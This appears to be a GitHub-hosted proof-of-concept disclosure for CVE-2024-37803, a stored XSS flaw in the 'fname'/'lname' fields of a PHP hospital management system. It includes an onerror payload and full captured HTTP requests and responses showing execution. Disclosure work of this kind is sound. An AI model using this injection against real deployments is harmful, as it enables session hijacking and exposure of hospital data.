-
Notifications
You must be signed in to change notification settings - Fork 0
/
CVE-2024-37803
95 lines (80 loc) · 3.33 KB
/
CVE-2024-37803
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
# Exploit Title: Health Care Hospital Management System - Stored Cross-Site Scripting (XSS)
# Exploit Author: Himanshu Bindra
# Date: 2024-06-05
# Vendor Homepage: https://code-projects.org/health-care-hospital-in-php-css-js-and-mysql-free-download/
# Software Link: https://download-media.code-projects.org/2020/04/Health_Care_hospital_IN_PHP_CSS_Js_AND_MYSQL__FREE_DOWNLOAD_AkGgvwi.zip
# Version: 1.0
# Tested on: Windows 11, PHP 8.2.12, Apache 2.4.58
# CVE: CVE-2024-37803
#Description: Health Care Hospital Management System v1.0 allows remote attackers to inject arbitrary web script or HTML via the 'fname' and 'lname' parameter.
#POC:
1) Go to the Staff info page in the Health Care Hospital Management System.
2) Enter the details and write your payload in the "fname", "lname" parameters. Payload : tes"><img+src=X+onerror=prompt(4356)></img>
3) Once the details are saved, view the "Staff members Details" and the javascript payload will be executed.
#Adding the Payload
HTTP Request:
POST /HMS/staff.php HTTP/1.1
Host: --REDACTED--
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:127.0) Gecko/20100101 Firefox/127.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded
Content-Length: 206
Origin: --REDACTED--
Connection: close
Referer: http://--REDACTED--/HMS/staff.php
Cookie: PHPSESSID=podmt61i233pamo53i63gt78f7
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Priority: u=1
dmun=superadmin&fname=tes"><img+src=X+onerror=prompt(4356)></img>&lname=test&addr=test%40test.com&tel=998877665&email=test123@GMAIL.COM&gender=Male&smbdd=2024-06-19&typesm=Doctor&workt=Morning&submit=SUBMIT
HTTP Response:
HTTP/1.1 200 OK
Date: Mon, 17 Jun 2024 18:07:39 GMT
Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
X-Powered-By: PHP/8.2.12
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 10412
--REDACTED--
<title>Health Care hospital</title>
<link rel="stylesheet" type="text/css" href="css/staff.css"/><script type="text/javascript" src="js/rightde.js
--REDACTED--
#Viewing the Staff details:
HTTP Request:
GET /HMS/staffmemd.php HTTP/1.1
Host: --REDACTED--
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:127.0) Gecko/20100101 Firefox/127.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: close
Referer: http://--REDACTED--/HMS/staff.php
Cookie: PHPSESSID=podmt61i233pamo53i63gt78f7
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Priority: u=1
HTTP Response:
HTTP/1.1 200 OK
Date: Mon, 17 Jun 2024 18:08:03 GMT
Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
X-Powered-By: PHP/8.2.12
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Content-Length: 7087
Connection: close
Content-Type: text/html; charset=UTF-8
--REDACTED--
<td align="center">tes"><img src=X onerror=prompt(4356)></img> test</td>
<td align="center">Doctor</td> --REDACTED--